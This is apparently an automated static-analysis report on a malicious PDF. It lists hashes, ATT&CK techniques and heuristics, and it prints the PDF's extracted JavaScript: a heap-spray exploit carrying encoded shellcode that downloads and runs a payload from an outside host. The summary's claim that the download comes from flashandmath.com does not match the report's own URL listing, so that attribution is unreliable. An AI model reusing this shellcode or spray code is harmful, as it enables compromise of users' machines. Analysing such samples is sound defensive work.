Malicious PDF — malware analysis report

Static analysis result for SHA-256 7254e51b4e3832ee…

MALICIOUS

PDF

37.7 KB
MD5: a19d9579f3d9b62eaa175ffb35b66161 SHA-1: 231470054792e7f0cd11d5d2d3fa7acd46e42aa7 SHA-256: 7254e51b4e3832ee2532e8b92c629985cde5b1d4811f35512a83a096a1e51c5f
186 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is a PDF file containing embedded JavaScript that is heavily obfuscated. The JavaScript appears to be designed to download and execute a second-stage payload from the URL http://www.flashandmath.com. The ML classifier and PDF JavaScript exploit cluster heuristics strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.flashandmath.com In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In PDF document text
    • http://adobe.com/AS3/2006/builtinIn PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
Adobe.swf
ce5f7936cf8e3536a88a804ce2d6902022df1794fa878bdc64a26866e34ba989		 pdf-embedded-file PDF EmbeddedFile object 16 at offset 0xAD3 55839 bytes
javascript_obj0006_000.js
4eeda950e76e79fa44e09de3a85dc310f31b4ace3655633006b8a5dfe3e8ce1c		 pdf-javascript-stream PDF /JS object 6 at offset 0xF5 1582 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var padding = String.fromCharCode(37008) + String.fromCharCode(37008);var html = padding + '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u7CEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010D\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C5A\uEB01\u048B\u018B\u89E8\u2444\u611C\uE8C3\uFF87\uFFFF\u8EBA\u0E4E\u52EC\uE850\uFF9E\uFFFF\uFF56\uBAD0\u1A36\u702F\u5052\u8FE8\uFFFF\u31FF\u52D2\u5352\u5255\uD0FF\u1AEB\u3DEB\u5AE8\uFFFF\uBAFF\uD87E\u73E2\u5052\u71E8\uFFFF\u31FF\u52D2\uD0FF\u69EB\u42E8\uFFFF\uBAFF\uFE98\u0E8A\u5052\u59E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uE8C3\uFEFC\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u31FF\u3131\u3131\u632E\u646D\u20FF\u7468\u7074\u2F3A\u742F\u7572\u616C\u3034\u2E38\u6577\u6862\u736F\u6974\u676E\u632E\u6D6F\u752E\u2F61\u6C62\u2F32\u642F\u776F\u6C6E\u616F\u5F64\u6966\u656C\u702E\u7068\u653F\u413D\u6F64\u6562\u322D\u3130\u2D30\u3832\u3438\uCDFF\u0003';while (padding.length < 65564){	padding+=padding;}var value = padding.substring(0, 0x5f4);value += html;value += padding;var destination = value.substring(0, 32768);while(1){	destination += destination;	if(destination.length >= 524288) break;}var today = destination.substring(0, 524288 - 2060);var forever = new Array();for (var infinite = 0; infinite < 496; infinite++){	forever[infinite]=today+'s';}

Open this report in the interactive analyzer, or submit your own file for analysis.